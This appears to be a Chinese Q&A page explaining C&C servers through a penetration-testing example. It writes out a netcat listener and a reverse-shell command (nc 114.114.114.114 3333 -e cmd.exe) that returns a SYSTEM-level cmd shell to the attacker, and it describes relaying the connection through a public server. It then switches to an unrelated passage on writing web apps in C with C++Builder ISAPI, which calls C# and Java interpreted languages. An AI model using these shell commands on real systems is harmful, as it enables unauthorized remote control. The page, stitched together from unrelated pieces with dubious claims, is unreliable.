什么是C&C服务器

C&C 服务器的全称是 Command and Control Server，翻译过来就是命令和控制服务器

通常在做渗透测试的时候，在拿到一个 webshell 的时候，需要对服务器进行提权操作，如果是一台 windows 的服务器，提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权，有些 exp 可以直接在后面加参数，溢出成功之后执行参数中的命令。

而有的 exp 溢出成功之后是返回一个 system 权限的 cmd，这时就需要将低权限的 cmd shell 反弹回本地，这里用 nc 在本地执行：nc -vv -lp 3333

上述命令的意思是在本地监听一个 3333 端口等待连接，假设电脑 IP 是公网的，并且 IP 为 114.114.114.114，然后在目标服务器就可以执行：nc 114.114.114.114 3333 -e cmd.exe

上面的命令就可以把远程服务器的服务器权限的 cmd shell 返回到本地，这时你就可以通过 nc 建立的这个 shell 进行通信，发送你要执行的命令，在远程服务器接收到命令之后执行并将结果返回，这时本机电脑就是一个简易的 C&C 服务器。

扩展资料：

C&C 服务器使目标机器可以接收来自服务器的命令，从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。

通常只有这样内网的服务器才可以访问进行连接，所以可以使用一台中转服务器，这台中转服务器有一个公网 IP 地址是：111.111.111.111，这样不管是目标服务器还是我们本机都可以访问这台中转服务器。

这里中转服务器的作用就是本地内网的主机监听的端口映射到公网 IP 的某个端口，这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。

用C语言开发WEB，可以用C++BUILDER6，称ISAPI，一般人可能做不起来，有点麻烦；

唯一是速度很快，别人看不到源码，掌握了编程套路，也可以开发应用；

缺点：

1。不是解释性语言，做的WEB调试非常麻烦；现在做WEB开发的，用C#、JAVA较多；都是解释性的语言；

2。因为是.DLL的二进制代码，一般商业网站不给予运行的环境，因为网站服务器会被你可能搞瘫，安全性得不到保障；所以，你得自备网页服务器；

3。得不到技术支持，因为没几个人会这种开发；

---